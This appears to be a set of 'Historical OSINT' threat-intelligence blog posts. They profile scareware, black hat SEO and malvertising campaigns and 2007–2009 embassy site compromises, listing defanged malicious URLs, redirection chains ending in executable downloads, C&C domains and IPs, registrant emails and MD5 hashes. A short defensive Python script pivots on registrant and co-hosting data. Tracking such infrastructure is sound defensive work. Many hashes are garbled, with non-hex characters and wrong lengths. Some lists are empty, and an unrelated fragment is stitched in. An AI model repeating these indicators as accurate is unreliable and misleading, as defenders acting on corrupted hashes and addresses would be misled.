Historical OSINT - Massive Black Hat SEO Campaign, Spotted in the Wild, Serves Scareware - Part Two

(2017-01-05 10:22)

In a cybercrime ecosystem dominated by fraudulent propositions, cybercriminals continue actively populating their botnet's infected population, further spreading malicious software and earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on the utilization of an affiliate-network based type of monetization scheme.

We've recently intercepted a currently active malicious black hat SEO (search engine optimization) campaign serving malicious software to unsuspecting users, further monetizing access to malware-infected hosts, largely relying on the utilization of an affiliate-network based type of monetization scheme.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Related malicious domains known to have participated in the campaign:

hxxp://notice-of-unreported-income-email.donatehalf.com
hxxp://911-pictures.jewishreference.com
hxxp://911-pictures.clpakman91.com
hxxp://9-l 1-quotes, miclweekpolitics.com

Sample URL redirection chain:

hxxp://trivet.gmgroupenterprises.com/style.js - 72.29.67.237
hxxp://trivet.gmgroupenterprises.com/?trivettrivetgmgroupenterprisescom.swf
hxxp://vpizclutebygugol.xorg.pl/go/ - 193.203.99.111
- hxxp://vpizclutebygugol.xorg.pl/go4/
- hxxp://http://free-checkpc.com/l/cl709f38e78s84y76u - 193.169.12.5
- hxxp://safe-fileshere.com/s/w58238e9a6clh76k73r/setup.exe - 193.169.12.5

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (193.203.99.111):

MD5: b761960b60f2e5617b4cla2e303969ffl
MD5: a27ae350b9cl29bl3749bl4e376a00b52
MD5: aclbacl83faclc017cl60972efa65eb3c230
MD5: bl323cl4c7elf6455701cl49621eclfb545
MD5: Cl66767c8aa7a8eee0dl2a6d9646b3e8


Once executed, a sample malware (MD5: b761960b60f2e5617b4da2e303969ffl) phones back to the following malicious C&C server IPs:

hxxp://bdx.xorg.pl - 193.203.99.111

Once executed, a sample malware (MD5: a27ae350b9d29bl3749bl4e376a00b52) phones back to the following malicious C&C server IPs:

hxxp://vboxsvr.ovh.net
hxxp://gwg.xorg.pl - 193.203.99.111

Once executed, a sample malware (MD5: adbad83fadc017d60972efa65eb3c230) phones back to the following malicious C&C server IPs:

hxxp://vboxsvr.ovh.net
hxxp://htu.xorg.pl - 193.203.99.111

Once executed, a sample malware (MD5: bl323d4c7elf6455701d49621edfb545) phones back to the following malicious C&C server IPs:

hxxp://htu.xorg.pl - 193.203.99.111

Once executed, a sample malware (MD5: Cl66767c8aa7a8eee0dl2a6d9646b3e8) phones back to the following malicious C&C server IPs:

hxxp://bdx.xorg.pl - 193.203.99.111

Sample detection rate for a sample malicious executable:

MD5: 7df300b01243a42b4ddff724999cd4f7

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://updatepcnow.com - 208.73.211.249
hxxp://safe-updates.com - 50.63.202.54; 54.85.196.8

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (208.73.211.249):

MD5: 940be22f37e30c90d9fded842c23b24d
MD5: ef29c61908f678f313aa298343845175
MD5: 47f5002a0b9d312f28822d92a3962c81
MD5: ba83653117a6196d8b2a52fbl68b8142
MD5: f29209flca6c4666207ea732clf32978

Once executed, a sample malware (MD5: 940be22f37e30c90d9fded842c23b24d) phones back to the following malicious C&C server IPs:

hxxp://softonic-analytics.net - 46.28.209.74
hxxp://superscan.sd.en.softonic.com - 46.28.209.70
hxxp://www.ledyazilim.com - 213.128.83.163

Once executed, a sample malware (MD5: ef29c61908f678f313aa298343845175) phones back to the following malicious C&C server IPs:

hxxp://ksandrafashion.com - 208.73.211.173
hxxp://www.Iafyeri.com
hxxp://kulppasur.com

Once executed, a sample malware (MD5: 47f5002a0b9d312f28822d92a3962c81) phones back to the following malicious C&C server IPs:

hxxp://ftuny.com/borders.php

Once executed, a sample malware (MD5: ba83653117a6196d8b2a52fbl68b8142) phones back to the following malicious C&C server IPs:

hxxp://mhc.ir - 82.99.218.195
hxxp://naphooclub.com - 208.73.211.173
hxxp://mdesigner.ir - 176.9.98.58

Once executed, a sample malware (MD5: f29209flca6c4666207ea732clf32978) phones back to the following malicious C&C server IPs:

hxxp://ftuny.com/borders.php
Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (50.63.202.54):

MD5: 45497b47a6df2f6216b4c4bebc572dd3
MD5: d5585af92c512bec3009bl568c8d2f7d
MD5: 08db02c9873c0534656901d5e9501f46
MD5: 830b22b4a0520dlb46a493f03a6a0a66
MD5: 5eelbfa766f367393782972718d4e82f

Once executed, a sample malware (MD5: 45497b47a6df2f6216b4c4bebc572dd3) phones back to the following malicious C&C server IPs:

hxxp://lordofthepings.ru - 173.254.236.159
hxxp://poppylols.ru
hxxp://chuckboris.ru
hxxp://kosherpig.xyz - 195.157.15.100

Once executed, a sample malware (MD5: d5585af92c512bec3009bl568c8d2f7d) phones back to the following malicious C&C server IPs:

hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 173.254.236.159
hxxp://yardnews.net - 104.154.95.49

Once executed, a sample malware (MD5: 08db02c9873c0534656901d5e9501f46) phones back to the following malicious C&C server IPs:

hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 173.254.236.159
hxxp://musicbroke.net - 195.22.28.210

Once executed, a sample malware (MD5: 830b22b4a0520dlb46a493f03a6a0a66) phones back to the following malicious C&C server IPs:

hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 173.254.236.159

Once executed, a sample malware (MD5: 5eelbfa766f367393782972718d4e82f) phones back to the following malicious C&C server IPs:

hxxp://riddenstorm.net - 208.100.26.234
hxxp://lordofthepings.ru - 173.254.236.159

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (54.85.196.8):

MD5: 05288748ddccf2e5fedef5d9e8218fef
MD5: 08936ff676b062a87182535bce23d901
MD5: ea2b2ea5a0bf2b8f6403b2200e5747a7
MD5: 8a7e330ad88dcb4ced3e5e843424f85f
MD5: bf3d996376663feaea6031blll4eb714

Related malicious domains known to have participated in the campaign:


Sample URL redirection chain:

hxxp://checkvirus-zone.com - 64.86.16.7 - Email: gertrudeedickens@text2re.com
- hxxp://checkvirus-zone.com/?p=

Sample detection rate for a sample malicious executable:

MD5: bl57106188c2debab5d2fl337c708e35

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://pencii-netwok.com/?act=fb&1=1&2=0&3= - 204.11.56.48; 204.11.56.45; 209.222.14.3; 208.73.210.215; 208.73.211.152; 204.13.160.107



Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

MD5: 3c3346426923504571f81caffdac698d
MD5: ad4244794693b41c775b324c4838982a
MD5: 6649b79938fl9f7ec9d06b7ba8a7aa8e
MD5: 0526944bfb43bl4d8f72fdl84cd8c259
MD5: 29932b0cb61011ffc4834c3b7586d956

Once executed, a sample malware (MD5: 3c3346426923504571f81caffdac698d) phones back to the following malicious C&C server IPs:

hxxp://www.vancityprinters.com - 104.31.76.211
hxxp://vancityprinters.com - 23.94.18.39
hxxp://vinasonthanh.com - 123.30.109.9

Once executed, a sample malware (MD5: ad4244794693b41c775b324c4838982a) phones back to the following malicious C&C server IPs:

hxxp://banboon.com - 204.11.56.48
hxxp://bdb.com.my - 103.4.7.143
hxxp://baulaung.org - 52.28.249.128

Once executed, a sample malware (MD5: 6649b79938fl9f7ec9d06b7ba8a7aa8e) phones back to the following malicious C&C server IPs:

hxxp://cubingapi.com - 204.11.56.48
hxxp://error.cubingapi.com - 204.11.56.48

Once executed, a sample malware (MD5: 0526944bfb43bl4d8f72fdl84cd8c259) phones back to the following malicious C&C server IPs:

hxxp://www.vancityprinters.com - 104.31.77.211
hxxp://vancityprinters.com - 23.94.18.39
hxxp://vinasonthanh.com - 123.30.109.9

Once executed, a sample malware (MD5: 29932b0cb61011ffc4834c3b7586d956) phones back to the following malicious C&C server IPs:

hxxp://vancityprinters.com - 23.94.18.39
hxxp://vinasonthanh.com - 123.30.109.9
hxxp://rms365x24.com - 166.78.145.90

We'll continue monitoring the campaign and post updates as soon as new developments take place.





Historical OSINT - Malicious Malvertising Campaign, Spotted at FoxNews, Serves Scareware

(2017-01-05 11:19)

In a cybercrime ecosystem dominated by fraudulent propositions, cybercriminals continue actively populating their botnet's infected population with hundreds of malicious releases, successfully generating hundreds of thousands of fraudulent revenue while populating their botnet's infected population, largely relying on the utilization of an affiliate-network based type of monetizing scheme.

We've recently intercepted a currently active malvertising campaign affecting FoxNews, successfully enticing users into executing malicious software on the affected PCs, with the cybercriminals behind it successfully earning fraudulent revenue, largely relying on the utilization of an affiliate-network based type of monetizing scheme.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample URL redirection chain:

hxxp://toppromooffer.com/vsm/index.html - 85.17.254.158; 69.43.161.174
- hxxp://78.47.132.222/a12/index.php?url=http://truconv.com/?a=125&s=4a12 - (78.47.132.222)
- hxxp://redirectclicks.com/?accs=845&tid=338 - 69.172.201.153; 176.74.176.178; 64.95.64.194
- hxxp://http://redirectclicks.com/?accs=845&tid=339

Related malicious domains known to have participated in the campaign:

hxxp://truconv.com - 78.46.88.202

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (78.46.88.202):

MD5: 473e3615795609a091a2f2d3dlbe2d00
MD5: 9e51c29682a6059b9b636db8bf7dcc25
MD5: 08a50ebcaa471cd45b3561c33740136d
MD5: e7d5f7a90ddfalfbe8dfce32d6e4alfl
MD5: fcdd2790dd5bl898ef8ee29092dca757

Once executed, a sample malware (MD5: 473e3615795609a091a2f2d3dlbe2d00) phones back to the following malicious C&C server IPs:

hxxp://yaskiya.cyberfight.de - 78.46.88.202

Once executed, a sample malware (MD5: 9e51c29682a6059b9b636db8bf7dcc25) phones back to the following malicious C&C server IPs:

hxxp://cfgllllll.go.3322.org - 118.184.176.13
hxxp://newsoft.kilu.org - 78.46.88.202
hxxp://mywebllllll.go.3322.org
hxxp://35free.net - 5.61.39.56
hxxp://newsoftl.go.3322.org
hxxp://newsoftll.go.3322.org

Once executed, a sample malware (MD5: 08a50ebcaa471cd45b3561c33740136d) phones back to the following malicious C&C server IPs:

hxxp://darthvader.dyndns.tv
hxxp://wwwl2.subdomain.com - 78.46.88.202

Once executed, a sample malware (MD5: e7d5f7a90ddfalfbe8dfce32d6e4alfl) phones back to the following malicious C&C server IPs:

hxxp://tundeghanawork.co.gp - 78.46.88.202

Once executed, a sample malware (MD5: fcdd2790dd5bl898ef8ee29092dca757) phones back to the following malicious C&C server IPs:

hxxp://newsoft.go.3322.org - 221.130.179.36
hxxp://cfgllllll.go.3322.org - 118.184.176.13
hxxp://newsoft.kilu.org - 78.46.88.202
hxxp://users6.nofeehost.com - 67.208.91.110

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (69.172.201.153):

MD5: C9ca43032633584ff2ae4e4d7442fl23
MD5: a099766f448acd6b032345dfd8c5491d
MD5: da39ccb40blc80775e0aa3ab7cefb4b0
MD5: 85750b93319bd2cf57e445elb4850b08
MD5: e521b31eb97d6d25e3dl65f2fe9ca3ba

Once executed, a sample malware (MD5: C9ca43032633584ff2ae4e4d7442fl23) phones back to the following malicious C&C server IPs:

hxxp://os.tokoholapisa.com - 54.229.133.176
hxxp://down2ioad.net - 69.172.201.153
hxxp://cdn.download2013.net - 185.152.65.38

Once executed, a sample malware (MD5: a099766f448acd6b032345dfd8c5491d) phones back to the following malicious C&C server IPs:

hxxp://chicostara.com - 91.142.252.26
hxxp://suewylIie.com
hxxp://dewpoint-eg.com - 195.157.15.100

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (176.74.176.178):

MD5: 116d07294fb4b78190f44524145eb200
MD5: f9e71f66e3aae789b245638a00b951a8
MD5: Id6d4a64a9901985b8a005eal66df584
MD5: acfala5f290c7dd4859b56b49be41038
MD5: b63fd04a8cdf69fb7215a70ccd0aef27

Once executed, a sample malware (MD5: 116d07294fb4b78190f44524145eb200) phones back to the following malicious C&C server IPs:

hxxp://www.on86.com - 69.172.201.153
hxxp://return.uk.uniregistry.com - 176.74.176.178

Once executed, a sample malware (MD5: f9e71f66e3aae789b245638a00b951a8) phones back to the following malicious C&C server IPs:

hxxp://www.linkbyte.com - 69.172.201.153
hxxp://return.uk.uniregistry.com - 176.74.176.178

Once executed, a sample malware (MD5: Id6d4a64a9901985b8a005eal66df584) phones back to the following malicious C&C server IPs:

hxxp://www.pnmchgameserver.com - 69.172.201.153
hxxp://return.uk.uniregistry.com - 176.74.176.178

Once executed, a sample malware (MD5: acfala5f290c7dd4859b56b49be41038) phones back to the following malicious C&C server IPs:

hxxp://www.97cln.com - 45.125.35.85
hxxp://www.97wg.com - 69.172.201.153
hxxp://return.uk.uniregistry.com - 176.74.176.178

Once executed, a sample malware (MD5: b63fd04a8cdf69fb7215a70ccd0aef27) phones back to the following malicious C&C server IPs:

hxxp://pajak.yogya.com - 69.172.201.153
hxxp://www.yogya.com
hxxp://return.uk.uniregistry.com - 176.74.176.178

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (64.95.64.194):

MD5: 7ca6214e3b75bclf7a41aef3267afc29

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://freshtravei.net - 184.168.221.36
hxxp://experiencetravei.net - 217.174.248.145
hxxp://freshyeiiow.net
hxxp://experienceyeiiow.net
hxxp://freshciose.net
hxxp://experienceciose.net

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (69.43.161.174):

MD5: 674fca39cafl8320e5a0e5fc45527ba4
MD5: 7017a26b53bc0402475cl6b900a6c98ae
MD5: 0b61f6clfaclclcll41a91c65c7f290b9358
MD5: 4d5bc6b69db093824aa905137850e883
MD5: 201dee0da7b7807808d681510317ab59

Once executed, a sample malware (MD5: 674fca39cafl8320e5a0e5fc45527ba4) phones back to the following malicious C&C server IPs:

hxxp://aahydrogen.com - 208.73.210.214
hxxp://greatinstant.net
hxxp://ginsdirect.net
hxxp://autoupioaders.net - 185.53.177.9

Once executed, a sample malware (MD5: 7017a26b53bc0402475d6b900a6c98ae) phones back to the following malicious C&C server IPs:

hxxp://w.wfetch.com - 69.43.161.174
hxxp://wwl.w.wfetch.com - 72.52.4.90

Once executed, a sample malware (MD5: 4d5bc6b69db093824aa905137850e883) phones back to the following malicious C&C server IPs:

hxxp://greattaby.com - 69.43.161.174
hxxp://ww41.greattaby.com - 141.8.224.79

Once executed, a sample malware (MD5: 201dee0da7b7807808d681510317ab59) phones back to the following malicious C&C server IPs:

hxxp://layer-ads.de - 69.43.161.174

Sample URL redirection chain:

hxxp://bonuspromooffer.com - 208.91.197.46; 141.8.226.14; 204.11.56.45; 204.11.56.26; 208.73.210.215; 208.73.211.246; 82.98.86.178
- hxxp://promotion-offer.com/vsm/adv/5?a=cspvm-sst-ozbc-sst&l=370&f=cs_3506417142&ex=l&ed=2&h=&sub=csp&prodabbr=3P_UVSM - 208.91.197.46; 204.11.56.48; 204.11.56.45; 204.11.56.26; 63.156.206.202; 63.149.176.12
- hxxp://easywebchecklive.com/l/fileslist.js - 94.247.2.215
- hxxp://78.47.132.222/a12/index2.php
- hxxp://78.47.132.221/a12/pdf.php?u=i1_0
- hxxp://78.47.132.221/a12/aff_12.exe?u=i1_0&spl=4

Once executed, a sample malware phones back to the following malicious C&C server IPs (208.91.197.46):

MD5: bl3flaf8fc426e350dfll565dcf281e8
MD5: al89b3334fbd9cd357aedff22c672e9c
MD5: da53b068538ff03e2fcl36c7d0816e39
MD5: ec08a877817c749597396e6b34b88e78
MD5: b9e7bf23de901280e62fd68090b5b8fa

Once executed, a sample malware (MD5: bl3flaf8fc426e350dfll565dcf281e8) phones back to the following malicious C&C server IPs:

hxxp://dtrack.sslsecurel.com - 193.166.255.171
hxxp://staticrr.paleokits.net - 205.251.219.192
hxxp://dtrack.seedls.com
hxxp://staticrr.sslsecurel.com

Once executed, a sample malware (MD5: al89b3334fbd9cd357aedff22c672e9c) phones back to the following malicious C&C server IPs:

hxxp://staticrr.paleokits.net - 54.230.11.231
hxxp://staticrr.sslsecurel.com - 193.166.255.171
hxxp://staticrr.sslsecure2.com
hxxp://staticrr.sslsecure3.com - 208.91.197.46

Once executed, a sample malware (MD5: ec08a877817c749597396e6b34b88e78) phones back to the following malicious C&C server IPs:

hxxp://skyworldent.com
hxxp://solitaireinfo.com
hxxp://speedholidays.com - 206.221.179.26

Once executed, a sample malware (MD5: b9e7bf23de901280e62fd68090b5b8fa) phones back to the following malicious C&C server IPs:

hxxp://api.v2.secdls.com
hxxp://api.v2.sslsecurel.com - 193.166.255.171
hxxp://api.v2.sslsecure2.com
hxxp://api.v2.sslsecure3.com - 208.91.197.46

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

MD5: 969601cbf069a849197289e042792419

We'll continue monitoring the campaign and post updates as soon as new developments take place.
Who’s Who in Cyber Crime for 2007? - New Media Malware Gang

• The Gang speaks out - “get lost” and die()
• Dots dots dots
• musicbox1.cn/iframe.php refreshes textdesk.com - refreshing Storm Worm domains - eliteproject.cn; takenames.cn; blOcker.info; space-sms.info
• French government’s Libya site hack assessment ends up to 208.72.168.176 - the gang’s main IP


Historical OSINT - Inside the 2007-2009 Series of Cyber Attacks Against Multiple International Embassies

(2017-05-29 08:28)

Remember the [1]Russian Business Network and the New Media Malware Gang?

It's been several years since I last posted an update regarding the group's activities, including the establishing of a direct connection between the [2]Russian Business Network and the [3]New Media Malware gang, including a variety of high profile Web site compromise campaigns.

What's particularly interesting about the group's activities is the fact that back in 2007 the group's activities used to dominate the threat landscape in a targeted fashion, including the active utilization of client-side exploits and the active exploitation of legitimate Web sites, successfully positioning the group, including the Russian Business Network, as a leading provider of malicious activities online, leading to a series of analyses successfully detailing the activities of the group, including the direct establishing of a connection between the New Media Malware Gang, the Russian Business Network and the Storm Worm botnet.

In this post I'll provide a detailed analysis of the group's activities, discuss in depth the tactics, techniques and procedures (TTPs) of the group, including a direct establishing of a connection between the New Media Malware Gang, the Russian Business Network and the direct compromise of a series of high profile Web sites.

Having successfully tracked down and profiled the group's activities for a period of several years, and based on the actionable intelligence provided regarding the group's activities, we can easily establish a direct connection between the New Media Malware Gang and the Russian Business Network, including a series of high profile Web site compromise campaigns.

Key Summary Points:

- RBN Connection, New Media Malware Gang connection - "ai siktir", "Die()", money mule recruitment, money laundering of virtual currency
- Actionable CYBERINT data to assist law enforcement, academics and the private sector in ongoing or past cybercrime investigations
- Complete domain portfolios registered up to the present day using the same emails used to register the malicious domains during 2007-2009 to assist law enforcement, academics and the private sector in catching up with their malicious activities over the years
- Detailed analysis of each and every campaign's domain portfolios (up to present day) further dissecting the fraudulent schemes launched by the same cybercriminals that embedded malware on the embassies' web sites
- Complete IP Hosting History for each and every of the malicious domains/command and control servers during the time of the attack
- The "Big Picture" detailing the inter-connections between the campaigns, with historical OSINT data pointing to the "New Media Malware Gang", back then customers of the Russian Business Network



Let's profile the group's activities, including a direct establishing of a connection between the Russian Business Network, the New Media Malware Gang and the Storm Worm botnet.

In 2007 I [4]profiled the direct compromise of the Syrian Embassy in London, including a related compromise of the [5]USAID.gov compromised, malware and exploits served, the [6]U.S Consulate St. Petersburg Serving Malware, [7]Bank of India Serving Malware, [8]French Embassy in Libya Serving Malware, [9]Ethiopian Embassy in Washington D.C Serving Malware, [10]Embassy of India in Spain Serving Malware, [11]Azerbaijanian Embassies in Pakistan and Hungary Serving Malware, further detailing the malicious activities of the Russian Business Network and the New Media Malware Gang.

Let's profile the campaigns and discuss in depth the direct connection between the group's activities, the Russian Business Network and the New Media Malware Gang.

sicil.info - on 2007-09-26, during the time of the attack, the domain was registered using the srvs4you@gmail.com email. The domain name first appeared online on 2006-06-10 with an IP 213.186.33.24. On 2007-07-11, it changed IPs to 203.121.79.71, followed by another change on 2008-01-06 to 202.75.38.150, another change on 2008-05-06 to 203.186.128.154, yet another change on 2008-05-18 to 190.183.63.103, and yet another change on 2008-07-27 to 190.183.63.56.

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (sicil.info):

MD5: 4802db20da46fca2al896d4c983bl3ba
MD5: f9434d86ef2959670b73a79947b0f4d2
MD5: 32dba64ae55e7bb4850e27274da42dlb
MD5: Cd6a7ff6388fbd94b7ee9cdc88ca8f4d
MD5: 57dff9e8154189f0a09fb62450decac6

Known to have responded to the same malicious C&C server IPs (sicil.info) are also the following malicious domains:

hxxp://144.217.69.62
hxxp://63.246.128.71
hxxp://207.150.177.28
hxxp://66.111.47.62
hxxp://66.111.47.4
hxxp://66.111.47.8

Related malicious MD5s known to have responded to the same malicious C&C server IPs (213.186.33.24):

MD5: Ia08c0ce5abl5e6fd8f52cd99ea64acb
MD5: 95cc3a0243aa050243ab858794cld221
MD5: cc63d67282789e03469f2e6520c6de80
MD5: 3829506c454b86297d2828077589cbf8
MD5: Iel8bl7149899d55d3625d47135a22a7

Once executed, a sample malware (MD5: Ia08c0ce5abl5e6fd8f52cd99ea64acb) phones back to the following malicious C&C server IPs:

hxxp://ioasis.org - 208.112.115.36
hxxp://polyhedrusgroup.com - 143.95.229.33
hxxp://espoirsetvie.com - 213.186.33.24
hxxp://ladiesdehaan.be - 185.59.17.113
hxxp://chonburicoop.net - 27.254.96.151
hxxp://ferienwohnung-walchensee-pur.de - 109.237.138.48

Related posts: [12]Dissecting a Sample Russian Business Network (RBN) Contract/Agreement Through the Prism of RBN's AbdAllah Franchise



Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (Oki.ru; 89.179.174.156):

MD5: Cd33ea55b2dl3df592663fl8e6426921
MD5: 8e0c7757b82dl4b988afac075e8ed5dc
MD5: e6aaafcafdd0a20d6dbe7f8c0bf4d012
MD5: e513alb25e59670f777398894dfe41b6
MD5: 0fad43c03d80aleb3a2clae9e9a6c9ed
MD5: 6elb789f0df30ba0798fbc47cblceclc
MD5: 9f02232ed0ee609c8dblb98325beaa94

Once executed, a sample malware (MD5: e6aaafcafdd0a20d6dbe7f8c0bf4d012) phones back to the following C&C server IPs:


Once executed, a sample malware (MD5: e513alb25e59670f777398894dfe41b6) phones back to the following malicious C&C server IPs:


Related malicious MD5s known to have phoned back to the same malicious C&C server IPs (miron555.org):

MD5: 0e423596c502cle28cce0c98df2a2b6d
MD5: e75d92defbllafe50a8cc51dfe4fb6ee
MD5: adcedd763f541e625f91030ee4de7cl9
MD5: 2c664a4cl374b3d887f59599704aef6c


Over the years (up to present day) srvs4you@gmail.com is also known to have been used to register the following domains:


On 2008-09-25, Oki.ru was registered using the kseninkopetrcanm.ru email. The same email address is not known to have been used to register any additional domains.

On 2008-06-19, xl2345.org was registered using the xix.xl2345@yahoo.com email. On 2007-09-10 the domain used to respond to 66.36.243.97, then on 2007-11-13 it changed IPs to 58.65.236.10, followed by another change on 2008-05-06 to 203.186.128.154. No other domains are known to have been registered using the same email address.

Note that the DNS history here predates the recorded registration date. That date is therefore best read as a WHOIS update or a re-registration rather than the domain's creation; the same pattern recurs for several of the domains profiled below, so registration dates in this data should not be used on their own to anchor a timeline.

On 2007-06-07, miron555.org was registered using the mironbot@gmail.com email, followed by a registrant email change on 2008-02-12 to nepishite555suda@gmail.com. On 2007-04-24 the domain responded to 75.126.4.163. It then changed IPs on 2007-05-09 to 203.121.71.165, followed by another change on 2007-06-08 to 58.65.239.247, yet another change on 2007-07-15 to 58.65.239.10, another change on 2007-08-19 to 58.65.239.66, a further change on 2007-09-03 to 217.170.77.210, and yet another change on 2007-09-18 to 88.255.90.138.

Historically (up to the present day), mironbot@gmail.com is also known to have been used to register the following domains:

hxxp://24-7onlinepharmacy.net
hxxp://bestmoviesonline.info
hxxp://brightstonepharma.com
hxxp://deapotheke.com
hxxp://dozor555.info
hxxp://my-traff.cn
hxxp://pharmacyit.net
hxxp://trffc.org
hxxp://trffc3.ru
hxxp://xmpharm.com
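The two pivots applied throughout this post are the registrant email (which other domains the same address registered) and the dated hosting history (which other domains sat on the same IP at the same time). The following is an added example, not code from the original post, that implements both over a small dataset constructed from the observations quoted above and from the winhex.org history given later in the post. The rule that a domain stays on an IP until its next recorded change is an assumption of the example, since passive DNS only records the dates on which it happened to look.

```python
from collections import defaultdict
from itertools import combinations

# Constructed from the dated A-record changes and registrant e-mails quoted in this
# post. Dates are ISO-8601 strings, which sort chronologically as plain text.
# Assumption of this example: a domain is treated as resolving to an IP from the date
# of an observation until its next observation (open-ended for the last one).
OBSERVATIONS = [
    ("miron555.org", "mironbot@gmail.com", [
        ("2007-04-24", "75.126.4.163"),
        ("2007-05-09", "203.121.71.165"),
        ("2007-06-08", "58.65.239.247"),
        ("2007-07-15", "58.65.239.10"),
        ("2007-08-19", "58.65.239.66"),
        ("2007-09-03", "217.170.77.210"),
        ("2007-09-18", "88.255.90.138"),
    ]),
    ("winhex.org", "ipspec@gmail.com", [
        ("2007-02-18", "195.189.247.56"),
        ("2007-03-03", "89.108.85.97"),
        ("2007-04-29", "203.121.71.165"),
        ("2007-08-19", "69.41.162.77"),
    ]),
    ("xl2345.org", "xix.xl2345@yahoo.com", [
        ("2007-09-10", "66.36.243.97"),
        ("2007-11-13", "58.65.236.10"),
        ("2008-05-06", "203.186.128.154"),
    ]),
    # Registrant known from the post, no hosting history quoted for them.
    ("dozor555.info", "mironbot@gmail.com", []),
    ("trffc.org", "mironbot@gmail.com", []),
]

OPEN_ENDED = "9999-12-31"  # sentinel "end" for a domain's last recorded IP


def registrant_clusters(observations):
    """First pivot: group domains by registrant e-mail, keeping only addresses that
    registered more than one domain (a single domain gives nothing to pivot on)."""
    clusters = defaultdict(set)
    for domain, email, _ in observations:
        clusters[email.strip().lower()].add(domain)
    return {email: sorted(doms) for email, doms in clusters.items() if len(doms) > 1}


def hosting_windows(observations):
    """Expand dated changes into (domain, ip, start, end) windows, end exclusive."""
    windows = []
    for domain, _, history in observations:
        ordered = sorted(history)
        for i, (start, ip) in enumerate(ordered):
            end = ordered[i + 1][0] if i + 1 < len(ordered) else OPEN_ENDED
            windows.append((domain, ip, start, end))
    return windows


def ip_at(observations, domain, day):
    """IP the domain was on at an ISO date, or None if before its first record."""
    for d, ip, start, end in hosting_windows(observations):
        if d == domain and start <= day < end:
            return ip
    return None


def co_hosted(observations):
    """Second pivot: pairs of different domains whose windows on the same IP overlap.
    Returns (ip, (domain_a, domain_b), overlap_start, overlap_end), sorted."""
    by_ip = defaultdict(list)
    for domain, ip, start, end in hosting_windows(observations):
        by_ip[ip].append((domain, start, end))
    overlaps = []
    for ip, wins in by_ip.items():
        for (d1, s1, e1), (d2, s2, e2) in combinations(wins, 2):
            if d1 == d2:
                continue  # a domain returning to its own old IP is not a pivot
            lo, hi = max(s1, s2), min(e1, e2)
            if lo < hi:
                overlaps.append((ip, tuple(sorted((d1, d2))), lo, hi))
    return sorted(overlaps)


if __name__ == "__main__":
    for email, doms in registrant_clusters(OBSERVATIONS).items():
        print(f"{email}: {', '.join(doms)}")
    for ip, pair, lo, hi in co_hosted(OBSERVATIONS):
        print(f"{pair[0]} and {pair[1]} shared {ip} between {lo} and {hi}")
```

On this dataset the registrant pivot groups miron555.org with dozor555.info and trffc.org, and the hosting pivot finds that winhex.org and miron555.org overlapped on 203.121.71.165 between 2007-05-09 and 2007-06-08, which is the kind of co-hosting overlap the post relies on to tie domains from different campaigns to one operator. Because the "until the next observation" rule can overstate how long a domain stayed on an address, treat a short overlap near a window boundary as a lead to confirm against a second passive-DNS source rather than as proof.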

In 2008, I profiled the direct compromise of [13]The Dutch Embassy in Moscow Serving Malware, further detailing the malicious activity of the Russian Business Network and the New Media Malware Gang.

Let's profile the campaign and discuss in depth the direct connection between the group's activities and the direct compromise of the Embassy's Web site.

On 2009-03-04, lmifsp.com was registered using the redemption@snapnames.com email. On 2007-11-30 it used to respond to 68.178.194.64, then on 2008-12-01 it changed IPs to 68.178.232.99. (redemption@snapnames.com is the placeholder contact of a domain backorder service, so this record reflects the domain lapsing and being picked up, not the original malicious registrant.)

In 2008, I profiled the direct compromise of [14]Embassy of Brazil in India Compromised, further establishing a direct connection between the group's activities and the Russian Business Network.

Let's profile the campaign and discuss in depth the direct connection between the group's activities and the Russian Business Network.

hxxp://google-analyze.com - 87.118.118.193

Related malicious MD5s known to have phoned back to the same malicious C&C server IP (google-analyze.com - 87.118.118.193):

MD5: 2bcb74c95f30e3741210c0de0c1b406f


On 2008-10-15, traff.asia was registered using the traffon@gmail.com email.

On 2008-06-19, google-analyze.com was registered using the incremental@list.ru email. On 2007-12-21 it responded to 66.36.241.153, then it changed IPs on 2007-12-22 to 66.36.231.94, followed by another change on 2008-02-03 to 79.135.166.74, then to 195.5.116.251 on 2008-03-16, to 70.84.133.34 on 2008-07-31, followed by yet another change to 216.195.59.77 on 2008-09-15.

On 2008-08-05, google-analystic.net is known to have responded to 212.117.163.162, and was registered using the abusecentre@gmail.com email. On 2008-04-11 it used to respond to 64.28.187.84; it then changed IPs to 85.255.120.195 on 2008-08-03, followed by another change on 2008-08-10 to 85.255.120.194, then to 85.255.120.197 on 2008-09-07, to 69.50.161.117 on 2008-09-14, then to 66.98.145.18 on 2008-10-11, followed by another change on 2008-10-25 to 209.160.67.56.

On 2008-11-11, beshragos.com was registered using the migejosh@yahoo.com email. On 2008-11-11 it used to respond to 79.135.187.38.

In 2009, I profiled the direct compromise of [15]Ethiopian Embassy in Washington D.C Serving Malware, further detailing the group's activities and establishing a direct connection between them and the Russian Business Network.

Let's profile the campaign and discuss in depth the direct connection between the group's activities and the Russian Business Network.

On 2009-01-19, ltvv.com is known to have responded to 69.172.201.153; 66.96.161.140; 122.10.52.139; 122.10.18.138; 67.229.44.15; 74.200.250.130; 69.170.135.92; 64.74.223.38, and was registered using the mogensen@fontdrift.com email.

